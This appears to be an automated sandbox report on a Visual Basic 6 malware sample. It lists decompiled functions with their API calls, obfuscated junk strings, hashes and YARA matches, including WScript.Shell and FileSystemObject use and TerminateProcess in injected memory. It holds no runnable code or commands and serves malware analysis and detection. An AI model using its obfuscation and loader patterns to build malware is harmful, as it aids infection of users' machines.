Opcode Fuzzy Hash: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction Fuzzy Hash: E5D20875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFB0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FFCE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FFF8
__vbaAryConstruct2.MSVBVM60(?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420008
#593.MSVBVM60(0000000A), ref: 00420026
__vbaFreeVar.MSVBVM60(0000000A), ref: 00420031
#537.MSVBVM60(000000D4,0000000A), ref: 0042003B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 00420045
#648.MSVBVM60(0000000A), ref: 0042005C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 00420080
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 00420093
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200A0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200D8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200E7
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0042010F
__vbaVarDup.MSVBVM60 ref: 00420143
#513.MSVBVM60(?,?,000000A2), ref: 00420155
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 00420176
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042017C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 00420186
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042018E
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 004201A1
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004201BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0042021E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042027D
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042029F
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 004202BD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202D0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202DD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202F7
#525.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420313
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042031D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420323
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420331
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042033B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420350
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042035D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420363
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420377
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042037F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203DA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203E4
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203EA
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203FF
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420407
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042045C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042049E
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204B3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204E8
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204FD
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420528
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420532
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420538
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420542
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042054A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420552
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205A5
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205AD
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205B5
__vbaAryDestruct.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205CC
__vbaFreeStr.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205D4

Strings

BESMUDSES, xrefs: 0042051F
MINESTRYGNING, xrefs: 00420336
Suppositoriets, xrefs: 00420457
:, xrefs: 004202A4
PREHISTORICS, xrefs: 00420126
2:2:2, xrefs: 00420347
UNINTERMITTEDLY, xrefs: 004202B8
Rappees, xrefs: 00420085
Jiggerens, xrefs: 0042008A

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction ID: 247844ea3c9e4145d6387bb99d9b60c49b8363080f8287a008bbd778335b1946
Opcode Fuzzy Hash: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction Fuzzy Hash: 36027E71900218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD7C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DD99
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DDB9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DDD4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DDE3
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DDFE
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DE08
__vbaNew2.MSVBVM60(0040259C,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DE20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DE82
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DEE1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DF03
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DF10
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DF1A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DF24
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF2F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF46
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF6E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF7B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF9A
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFA0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFAA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFB9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFC1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DFD4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DFE4
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DFEB
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DFF9
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E002
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E00C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E014
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E04A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E052
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E05A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E062

Strings

baadene, xrefs: 0041DDB0
Ambulancesagen2, xrefs: 0041DDBE
appdata, xrefs: 0041DF5A
Reklamekampagne4, xrefs: 0041DDF9
CONTINUATOR, xrefs: 0041DF08
Jordfstedes4, xrefs: 0041DF2A
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DF80
Scopiformly9, xrefs: 0041DDAB

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction ID: ab1f30ff9109013bb15fdbf0051d3cce643812e99e5e35539fe9f4867291def5
Opcode Fuzzy Hash: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction Fuzzy Hash: 3D712971E00218AADB10EBA1CD46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420764, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420782
#575.MSVBVM60(?,00000003), ref: 004207D1
#518.MSVBVM60(?,?,?,00000003), ref: 004207DE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420802
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042081C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,00401546), ref: 0042084D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208AF
__vbaChkstk.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208E0
__vbaStrI4.MSVBVM60(005E4C2E), ref: 004208F6
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420900
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420941
__vbaFreeStr.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420958
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420960
#573.MSVBVM60(?,00000002), ref: 00420982
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004209A6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209AC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209B6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209BE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004209D1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 004209F3
#564.MSVBVM60(00000004,?), ref: 00420AC7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420AE1
__vbaI4Var.MSVBVM60(?), ref: 00420AF9
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 00420B1A
__vbaOnError.MSVBVM60(000000FF), ref: 00420BB0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 00420BC1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 00420BCB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BD1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BDC
__vbaAryDestruct.MSVBVM60(00000000,?,00420C28), ref: 00420C1A
__vbaFreeStr.MSVBVM60(00000000,?,00420C28), ref: 00420C22

Strings

FOSTERET, xrefs: 004207E3

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction ID: 0a74493fcb3b3f3581d043cebca2ef6a7ffca69fdbafcbed18917615b5d4a0b9
Opcode Fuzzy Hash: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction Fuzzy Hash: 18D1F9B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB4D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EB68
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EB80
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB90
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB99
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBA3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBAB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041EBCC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041EBE8
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041EBF5
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041EC01
#697.MSVBVM60(000009AE,?,00000000), ref: 0041EC13
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041EC1D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC2C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC36
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC58
__vbaFreeObj.MSVBVM60(0041EC76,?,00000000), ref: 0041EC60
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC68
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC70

Strings

Scripting.FileSystemObject, xrefs: 0041EB87
Propreste7, xrefs: 0041EC22
Gulsoterne, xrefs: 0041EBB0
FolderExists, xrefs: 0041EBDC
Desorganisationens, xrefs: 0041EC27

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction ID: eb56394621d30b47d1e7f0c1fe64527459e02528fbb533b5cfa1a86cf3aef07b
Opcode Fuzzy Hash: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction Fuzzy Hash: C4312B71910218ABDB14EBA2CD86FEE7778AF11708F60453FB101770E2EBBD5A458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042142C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421448
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421475
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042148C
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00421491
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004214AA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214C1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214CA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214D4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214DC
__vbaFreeStr.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214F5
__vbaFreeObj.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214FD

Strings

WScript.Shell, xrefs: 004214B8

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction ID: 7982085fe91bb987341f93e765445301efc6d1d96112fe3bd4a9835da013b008
Opcode Fuzzy Hash: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction Fuzzy Hash: E4110DB1900208BBDB10EFA1DD46BDEBBB8AB44708F50456EF101761E1DBBD5A448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00421516, Relevance: 15.1, APIs: 10, Instructions: 102COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421531
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042154A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,00000058), ref: 00421576
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00421591
#644.MSVBVM60(?,?,?), ref: 0042159A
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004215AB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215EA
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,000002B0), ref: 00421632
__vbaFreeObj.MSVBVM60(00421659), ref: 00421653

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction ID: e07db963fa73634f9fc6910f5233b6cd176df257759dfbc213d863687aa02990
Opcode Fuzzy Hash: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction Fuzzy Hash: A7415771900218AFCF01EF91CC46BDEBBB5FF14344F10042AF901BB1A1C7B999858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 004019C8, 00401888

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction ID: c9fd10dba90da17dfd0b65ae3975065bc430cd2f57dc6279ad09ea6a8859824d
Opcode Fuzzy Hash: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction Fuzzy Hash: FC41FDA144E3C05FD7038B748C762917FB0AE53204B1E90EBC8D1CF5A3D22C591AD7AA

Uniqueness

Uniqueness Score: -1.00%

Function 02283E87, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 4934953194a55d873ce9355d0675084dbe72f34c6ce1695f9cac5155223d408d
Instruction ID: cc0b65c5c8320438fef56d0815252f3aede03509d85508472777723c8723fc07
Opcode Fuzzy Hash: 4934953194a55d873ce9355d0675084dbe72f34c6ce1695f9cac5155223d408d
Instruction Fuzzy Hash: CC31443051D6C1DAC723DA7884083EAFF60EF12314F1886DEC4954B1A6C776911AC752

Uniqueness

Uniqueness Score: -1.00%

Function 02283E65, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: cc9ed738baa393f45bcedf63d854a6043c81236317d265c0c32570126a79c6b0
Instruction ID: 77c3491115b04683bb71fcb58057d93cf31007dc9b8c227e5cc4c4c3530384d9
Opcode Fuzzy Hash: cc9ed738baa393f45bcedf63d854a6043c81236317d265c0c32570126a79c6b0
Instruction Fuzzy Hash: 0F21F47151D7C6DAC712CA7884087EABF60AF12304F1882DDD4848B1A6C7729115CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02283FA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 44050b7bd7a67e7897c800161cce0dce35f873dd4e30ba9dc1bde32c57eb38bd
Instruction ID: 20f6ea2319a35bbe59335bc5d06b49ccb0eedfa1db60acb618e078121eaa5a04
Opcode Fuzzy Hash: 44050b7bd7a67e7897c800161cce0dce35f873dd4e30ba9dc1bde32c57eb38bd
Instruction Fuzzy Hash: E70166715292C2EFD7169A38840A3D6FF70AF12304F6445AEC4C1CA192C7A2814ACB13

Uniqueness

Uniqueness Score: -1.00%

Function 02283E69, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 15264da95f5f0445afc7e25e93b9ee560d346cb4ec342bcc0324bdc3266c286d
Instruction ID: 7214214d817c54b6ff02363ce027fe2ba7e1b3a6b912a67e88ca98433fe7dadc
Opcode Fuzzy Hash: 15264da95f5f0445afc7e25e93b9ee560d346cb4ec342bcc0324bdc3266c286d
Instruction Fuzzy Hash: B6F0E931121255EFCF246EB0D959BFA33B5AF02744F10041CE99A95525D7B6C144CF13

Uniqueness

Uniqueness Score: -1.00%

